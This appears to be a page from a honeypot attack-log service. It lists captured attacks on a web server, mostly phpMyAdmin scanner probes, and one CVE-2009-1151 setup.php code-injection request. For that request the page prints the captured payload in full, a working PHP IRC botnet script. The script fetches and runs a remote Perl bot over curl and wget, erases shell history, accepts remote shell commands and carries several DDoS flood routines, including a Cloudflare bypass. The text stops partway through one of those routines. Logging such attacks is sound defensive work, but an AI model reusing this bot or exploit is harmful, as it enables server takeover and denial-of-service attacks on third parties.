Help on available search operators
Operators
tag: filter by relevant keywords (e.g., shellshock)
port: filter by destination port
attacker: filter by attacker IP address
country: filter by attacker country (2 letters)
since: filter since provided date (dd/mm/yyyy format)
plugin: filter by plugin ID
resource: filter requests with a resource with the given MD5
Hints
The minus operator - can be used to exclude the results containing a given keyword.
You can combine different operators, or provide multiple values for each one using comma as separator.
e.g., port:80,8080
e.g., port:80 -scripts/setup.php
e.g., upload?org.apache.catalina.filters port:8080
1-10 of 89471 results (8948 pages)
phpMyAdmin scanner
[Attack info]
Attacker:
106.12.110.191
Dest. port: 80
Time: 21/02/2019 12:55:43
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS38365 Beijing Baidu Netcom Science and Technology Co., Ltd.
Location: Beijing, Beijing
Description
This module detects attackers who try to detect phpMyAdmin installations.CVE
N/AAuthor
UnknownReference
N/APlugin ID
1a0271bb9ff236c3d3a42b4bcb0751f5GET /phpMyAdmin/index.php HTTP/1.1
Host: 201.6.177.246
cache-control: no-cache
connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Resource ( 1 / 0 )
phpMyAdmin scanner
[Attack info]
Attacker:
118.24.179.105
Dest. port: 80
Time: 19/02/2019 04:35:16
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian
Description
This module detects attackers who try to detect phpMyAdmin installations.CVE
N/AAuthor
UnknownReference
N/APlugin ID
1a0271bb9ff236c3d3a42b4bcb0751f5GET /phpMyAdmin/index.php HTTP/1.1
Host: 21.171.51.29
cache-control: no-cache
connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Resource ( 1 / 0 )
phpMyAdmin scanner
[Attack info]
Attacker:
160.19.49.174
Dest. port: 80
Time: 18/02/2019 05:52:39
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS135386 LinkChina Telecom Global Limited.
Location: Wan Chai, Wanchai
Description
This module detects attackers who try to detect phpMyAdmin installations.CVE
N/AAuthor
UnknownReference
N/APlugin ID
1a0271bb9ff236c3d3a42b4bcb0751f5GET /phpmyadmin/index.php HTTP/1.1
Host: 21.171.51.29
cache-control: no-cache
connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Resource ( 1 / 0 )
phpMyAdmin scanner
[Attack info]
Attacker:
119.29.198.201
Dest. port: 80
Time: 17/02/2019 16:55:56
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Beijing
Description
This module detects attackers who try to detect phpMyAdmin installations.CVE
N/AAuthor
UnknownReference
N/APlugin ID
1a0271bb9ff236c3d3a42b4bcb0751f5GET /phpMyAdmin/index.php HTTP/1.1
Host: 21.171.51.29
cache-control: no-cache
connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/31.0
Resource ( 1 / 0 )
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
51.75.68.146
Dest. port: 80
Time: 17/02/2019 08:32:21
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Hauts-de-France, Roubaix (zipcode 59100)
rDNS: 146.ip-51-75-68.eu
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 231
cookie2: $Version="1"
Host: 21.171.51.29
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://21.171.51.29/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=d007a44761984bd2008c50bad4ee5c17
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=d7961c1f90c9e481f0aa6d63b1d8009d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A24%3A%22ftp%3A%2F%2F51%2E75%2E68%2E146%2Fpub%2Fx%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: d9030cacb19a6bff1f4c5f78d1288ac7
Type: text/x-php
Size: 44240
URL: ftp://51.75.68.146/pub/x
# SUCK MY DICK HONERIX!!! :)))
# _|_!!
<?php
$cfg = array(
"server" => "91.134.146.175",
"port" => "1984",
"key" => "",
"prefix" => "|",
"maxrand" => "9",
"chan" => "#test",
"trigger" => "",
"hostauth" => "sidehost"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
$url="http://92.222.68.32/";
exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;GET '.$url.'bot.pl > bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
passthru('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
system('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
shell_exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
popen('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'bot.pl; perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;GET '.$url.'bot.pl > bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@passthru('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@system('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@shell_exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@popen('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'bot.pl; perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[UKN]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[UKN]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Finished!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2HttpFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2HttpFlood Finished!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Started!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Finished (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TCP Started!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2TCP Finished!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2Started Slowread!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
